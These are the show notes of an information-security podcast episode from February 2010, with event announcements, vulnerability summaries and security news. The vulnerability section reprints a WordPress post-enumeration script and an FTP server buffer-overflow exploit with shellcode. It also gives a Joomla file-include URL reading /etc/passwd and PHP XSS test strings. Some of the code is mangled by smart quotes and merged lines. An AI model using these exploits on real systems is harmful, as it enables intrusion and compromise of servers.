ISD Podcast Episode 74 for February 24, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
- MyHardDriveDied.com
- Scott will be putting on his SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191
- Data Recovery Class April 12th to the 16th in Washington DC goto MyHardDriveDied.com or email smoulton at nicservices dot com for more information.
- Outerzone March 19th and 20th near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
- Starts early Saturday morning at the Wellseley Inn Atlanta Airport Hotel (http://www.wellesleyinnatlanta.com) 1377 Virginia Avenue, Atlanta, GA 30344 (404) 762-5111
- The next DC404 meeting will be at Outerzone
- SANS Community Atlanta
- SANS Audit 507: Auditing Networks, Perimeter and Systems March 15 – 20, 2010 (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)
- SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs, GA starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538).
Friends of the Podcast:
Webhosting services:WebSpeedway
Vulnerabilities of Interest:
- WordPress is subject to an information-disclosure vulnerability because it fails to properly restrict access to trashed posts. An attacker can exploit this vulnerability to view other authors’ trashed posts, which may aid in further attacks. Versions prior to WordPress 2.9.2 are vulnerable. The following exploit code is available:
#/usr/bin/python
#
# WordPress > 2.9 Failure to Restrict URL Access PoC
#
# This script iterates through the WP post ID’s as an authenticated and unauthenticated user.
# If the requests differ a ‘Trash’ post has been found.
#
# You will need an authenticated user cookie of any priveledge to run this script.
#
# Example cookie:
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
#
# Will only work with WP URLs with the ‘/?p={int}’ parameter. Would need to handle redirects (3xx) to handle all URL types.
#
#
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)import httplib
# Declare vars
blogURL = “www.example.com”
userCookie = “enter_cookie_here”
postID = 0 #Leave at 0conn = httplib.HTTPConnection(blogURL)
Headers = {“Cookie” : userCookie}print
print “Target = http://” + blogURL + “/?p=” + str(postID)
printwhile 1:
# Start non authenticated enumeration
request = ‘/?p=’ + str(postID)
conn.request(“GET”, request, “”)try:
r1 = conn.getresponse()
except:
print “Connection error”data1 = r1.read()
# Start authenticated enumeration
conn.request(“GET”, request, None, Headers)
try:
r2 = conn.getresponse()
except:
print “Connection error”data2 = r2.read()
# Compare the HTML body reponses
if data1 != data2:
print “+ Found! http://” + blogURL + request
else:
print requestpostID += 1
conn.close()
- UplusFtp (formerly Easy Ftp Server) is subject to multiple remote buffer-overflow vulnerabilities. Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. UplusFtp 1.7.0.12 is vulnerable; prior versions, including Easy Ftp Server, may also be affected. Exploit code is available:
#!/usr/bin/python# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
# From: The eh?-Team || The Great White Fuzz (we’re not sure yet)
# Author: dookie2000ca
# Date: 14/02/2010
# Found by: loneferret
# Date Found: 13/02/2010# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
# Tested on: Windows XP SP3 Professionalimport socket
import sys# msfpayload windows/exec cmd=calc.exe R | msfencode -b ‘\x00\x0a\x2f\x5c’ -e x86/shikata_ga_nai -t c
# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)shellcode = (“\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93″
“\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f”
“\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04″
“\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb”
“\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e”
“\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6″
“\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21″
“\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11″
“\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a”
“\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5″
“\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21″
“\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69″
“\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36″
“\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5″
“\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b”
“\x1b\x35\x1d”)sled = “\x90″ * 10
filler = “\x90″ * 30
eip = “\x8B\x38\xAB\x71″ # 71AB388B JMP EBP WS2_32.DLL
trailer = “\x43″ * 48evil = sled + shellcode + filler + eip + trailer
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((’192.168.1.142′,21))
s.recv(1024)
s.send(‘USER dookie\r\n’)
s.recv(1024)
s.send(‘PASS dookie\r\n’)
s.recv(1024)
s.send(‘MKD ‘ + evil + ‘\r\n’)
s.recv(1024)
s.send(‘QUIT\r\n’)
s.close - Apache Tomcat is subject to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting this issue allows attackers to delete arbitrary files within the context of the current working directory. The following versions are affected: Tomcat 5.5.0 through 5.5.28 and Tomcat 6.0.0 through 6.0.20. An attacker can exploit this issue by deploying a malicious WAR file.
- FUSE (Filesystem in Userspace) is subject to a race-condition vulnerability. A local attacker can exploit this issue to cause a denial of service via symlink attacks involving FUSE shares belonging to privileged users. NOTE: For an exploit to succeed, the attacker must be a member of the ‘fuse’ group. Attackers can use standard commands to exploit this issue.
- Todd Miller ‘sudo’ is subject to a local privilege-escalation vulnerability because it fails to correctly handle the ‘sudoedit’ command. Local attackers could exploit this issue to run arbitrary commands as the ‘root’ user. Successful exploits can completely compromise an affected computer. This issue affects ‘sudo’ 1.6.9 through 1.7.2p3. Local attackers can use readily available commands to exploit this issue.
- The Core Design Scriptegrator component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Example URL: http://www.sample.com/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
- PHP is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks. Versions prior to PHP 5.2.12 are vulnerable. PHP code is available:
// overlong UTF-8 sequence
echo htmlspecialchars(“A\xC0\xAF&”, ENT_QUOTES, ‘UTF-8′);
// invalid Shift_JIS sequence
echo htmlspecialchars(“B\x80&”, ENT_QUOTES, ‘Shift_JIS’);
echo htmlspecialchars(“C\x81\x7f&”, ENT_QUOTES, ‘Shift_JIS’);
// invalid EUC-JP sequence
echo htmlspecialchars(“D\x80&”, ENT_QUOTES, ‘EUC-JP’);
echo htmlspecialchars(“E\xA1\xFF&”, ENT_QUOTES, ‘EUC-JP’);
echo htmlspecialchars(“F\x8E\xFF&”, ENT_QUOTES, ‘EUC-JP’);
echo htmlspecialchars(“G\x8F\xA1\xFF&”, ENT_QUOTES, ‘EUC-JP’);
News Items of Interest:
News item 1: http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3213469
Intel was targeted by “sophisticated” attacks last month, about the same time that Google reported its network had been breached, allegedly by Chinese hackers.
In its annual report filed on Monday with the US Securities and Exchange Commission (SEC), Intel confirmed that it had been hit in January.
“We regularly face attempts by others to gain unauthorised access through the internet to our information technology systems by, for example, masquerading as authorised users or surreptitious introduction of software,” read the report. “These attempts, which might be the result of industrial or other espionage, or actions by hackers seeking to harm the company, its products, or end users, are sometimes successful. One recent and sophisticated incident occurred in January 2010 around the same time as the recently publicised security incident reported by Google.”
Intel did not reveal whether the attacks had accessed or stolen confidential company information, an admission that Google made last month when it broke the news that it, and other major Western corporations, had been struck by what it called “highly sophisticated and targeted” attacks.
News item 2: http://www.adobe.com/support/security/bulletins/apsb10-08.html
Adobe has fixed a critical vulnerability in Download Manager for the second time in six weeks. The program is used to download the company’s two most popular products, Adobe Reader and Flash Player. The bug, Adobe acknowledged in an advisory, “potentially allow[s] an attacker to download and install unauthorised software onto a user’s system”.
Israeli security researcher Aviv Raff disclosed the vulnerability last week, when he said that attackers could use the Download Manager to forcibly download and install any executable file, including attack code.
“If you go to Adobe’s website to install a security update for Flash, you really expose yourself to a zero-day attack,” Raff said.
Download Manager is not the update mechanism for Reader and Flash Player – that’s called Adobe Updater – but instead oversees file transfers from Adobe’s site
News item 3: http://news.bbc.co.uk/2/hi/business/8533551.stm
The European Commission is looking into complaints about Google’s behaviour, the company has revealed. The complaints were made by UK price comparison site Foundem, French legal search engine ejustice.fr, and Microsoft’s Ciao. Google’s senior competition lawyer Julia Holtz said the internet giant was “confident” it operated within European competition law. Foundem claims that its site is demoted in Google’s search results. “Foundem… argues that our algorithms demote their site in our results because they are a vertical search engine and so a direct competitor to Google,” Google said.
Foundem founder Shivaun Raff said its problems with Google’s rankings were resolved in December 2009, but it was filing the complaint on behalf of other search firms.
News item 4: http://www.scribd.com/doc/25550091/Proj-Grey-Goose-report-on-Critical-Infrastructure-Attacks-Actors-and-Emerging-Threats
According to Kelly Jackson Higgins, attacks against the power grid are likely to rise and intensify during the next 12 months as smart grid research and pilot projects advance, according to utility security experts and a recently published report that analyzes threats to critical infrastructure.
The so-called Project Grey Goose Report on Critical Infrastructure points to state and/or non-state sponsored hackers from the Russian Federation of Independent States, Turkey, and China as the main threats to targeting and hacking into energy providers and other critical infrastructure networks.
Jeffrey Carr, principal investigator for Project Grey Goose and founder and CEO of GreyLogic, says he and other researchers working on the report initially focused on answering the question of whether there have been any successful cyberattacks on the utilities. “Some companies say there’s never been a successful attack against the grid, but that’s not true,” he says. “There have been at least 120 instances” of successful attacks, some of which are documented in the report and date back to 2001.
Several utility security experts agree that utility security administrators will have their hands full during the next year, as the transition from isolated, closed energy-generation and transmission networks to IP-based and wireless ones begins to take shape in the form of pilot smart grid projects.
The Federal Trade Commission (FTC) said it has identified widespread data leaks from businesses, schools and local governments on peer-to-peer (P2P) file-sharing networks.
As a consequence, the FTC recently alerted nearly 100 organizations whose sensitive information, including personal data about customers and employees, is currently residing on P2P networks. The notices were sent to both private and public organizations ranging in size from eight to tens of thousands of employees.
FTC Chairman Jon Leibowitz said in a statement. “For example, we found health-related information, financial records and drivers’ license and Social Security numbers — the kind of information that could lead to identity theft.” The FTC on also released educational materials for businesses about the risks of P2P networks and ways to manage them.
News item 6: http://news.cnet.com/8301-13579_3-10457460-37.html?part=rss&subj=news&tag=2547-1_3-0-20
Apple notified developer Chillifresh that its Wobble iBoobs application was being removed from the App Store due to its “overtly sexual” nature. Since then, it appears that Apple has gone on a rampage of sex-oriented app removals.
Chillifresh claimed in a Saturday post that a discussion with Apple revealed that more than 5,000 apps have been affected by its new App Store content policy. Apple said the change was triggered by numerous customer complaints, according to Chillifresh.
Data from iPhone app-tracking Web site AppShopper supports the claim. AppShopper sister site MacRumors on Sunday reported that app removals went from about 100 a day to a high of almost 4,000 on Friday.
Chillifresh said on its Web site that an Apple representative told the developer that under its new App Store policy, it will not accept applications that in any way imply sexual content or include the following:
* images of women in bikinis
* images of men in bikinis
* images of skin
* silhouettes indicating that the app includes sexual images
* sexual connotations or innuendo
* sexually arousing content
Interestingly, some apps that include sexual content, such as Playboy’s, seem to have been missed by the recent purge–so far, at least. Doing a search for “girls” on the App Store will bring up a variety of apps with bikini-clad women and others that appear to break the new rules Chillifresh said Apple outlined.
